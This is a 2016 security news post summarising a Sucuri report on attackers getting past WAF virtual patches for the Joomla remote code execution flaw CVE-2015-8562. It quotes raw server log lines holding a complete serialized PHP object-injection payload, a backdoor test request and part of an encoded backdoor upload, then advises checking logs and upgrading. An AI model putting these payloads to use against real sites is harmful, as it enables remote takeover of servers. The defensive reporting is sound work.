18 July 2016

Almost any WAF (Web Application Firewall) solution can be bypassed using tricky and sophisticated techniques or different attack vectors. A blog post by Sucuri demonstrates this perfectly.

The short story: last year we became aware of a severe vulnerability in Joomla! (CVE-2015-8562), which led to remote PHP code execution. The exploit for this vulnerability was quickly released to public following numerous website compromises. Vendor has released the patch and many website owners installed it. Some of them however put too much faith into WAF technology and virtual patching, instead of installing the actual patch. The virtual patch for this particular vulnerability was quickly implemented by WAF maintainers and everybody lived happily ever after until… a new attack vector was introduced.

The new approach used unknown vector via “filter-search” option within HTTP POST request instead of HTTP User-Agent header. This allowed to bypass implemented WAF rules and successfully compromise websites without update. The new exploit looks like this in log files:

46.183.219.91 - - [19/Jun/2016:03:16:21 -0400] "POST /?option=com_tags HTTP/1.1" 403 4229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36" "POSTLOG:filter-search=bigus%7D__hxsjcurrrt%7CO%3A21%3A%22JDatabaseDriverMysqli%22%3A3%3A%7Bs%3A4%3A%22%5C0%5C0%5C0a%22%3BO%3A17%3A%22JSimplepieFactory%22%3A0%3A%7B%7Ds%3A21%3A%22%5C0%5C0%5C0disconnectHandlers%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3BO%3A9%3A%22SimplePie%22%3A5%3A%7Bs%3A8%3A%22sanitize%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7Ds%3A5%3A%22cache%22%3Bb%3A1%3Bs%3A19%3A%22cache_name_function%22%3Bs%3A6%3A%22assert%22%3Bs%3A10%3A%22javascript%22%3Bi%3A9999%3Bs%3A8%3A%22feed_url%22%3Bs%3A71%3A%22eval%28base64_decode%28%24_SERVER%5B%27HTTP_QGYSD%27%5D%29%29%3BJFactory%3A%3AgetConfig%28%29%3Bexit%3B%22%3B%7Di%3A1%3Bs%3A4%3A%22init%22%3B%7D%7Ds%3A13%3A%22%5C0%5C0%5C0connection%22%3Bi%3A1%3B%7D\xF0\xFD\xFD\xFD"

According to Sucuri investigation, the hackers injected backdoor in June, but did not use in until July. Below is an example of test, performed by malicious actors to test successful backdoor installation:

46.183.219.91 - - [01/Jul/2016:04:41:20 -0400] "POST /modules/cache.uniq_04793.php HTTP/1.1" 403 4261 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36" "POSTLOG:&php_func=assert&php=print%28%22MY_S%22.%22UCCESS%22%29%3B"

Backdoor installation:

46.183.219.91 - - [01/Jul/2016:09:35:27 -0400] "POST /modules/cache.uniq_04793.php HTTP/1.1" 403 4261 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36" "POSTLOG:&php_func=assert&php=assert%28base64_decode%28str_rot13%28%27MKMuoPuvLKAyAwEsMTIwo2EyXUA0py9lo3DkZltaHHEwnaO6rJukHR52EwWWAHDlqKyZZzqHpUb5nUSDIwqEETWOHUMSHxIVI0ySoGOgDzbjJRAgAQuQZ09vpR4jJSSRLauhFwIxFmWOnH1HFUEQEx5uD1IOq3O6rJckHR9zGRb1LKSXH2SAEmO2EacGZxkWDKqjraydpIOJqUSIrJcAEmO2pIEWAUSDBIuZF011FQWOoT5YGmOJqx9gpUcnBIM6qGOkIH42JJj5oR1XH2MjZ0I1pIE5oKSHrKqjoQIdpUb4nJ5uJzyZFwI1o1I5ZT5XDJ1M….”

We suggest Joomla! website owners to check their logs for presence of IP address 46.183.219.91, related to this incident.

We recommend installing the last version of Joomla 3.4.6 or higher, which fixes this vulnerability.